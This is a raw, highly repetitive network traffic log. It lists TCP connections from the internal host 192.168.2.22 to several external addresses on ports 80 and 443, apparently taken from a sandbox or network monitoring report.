Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 93.113.54.56:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 34.166.62.190:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.168.45.34:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.168.45.34:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49169
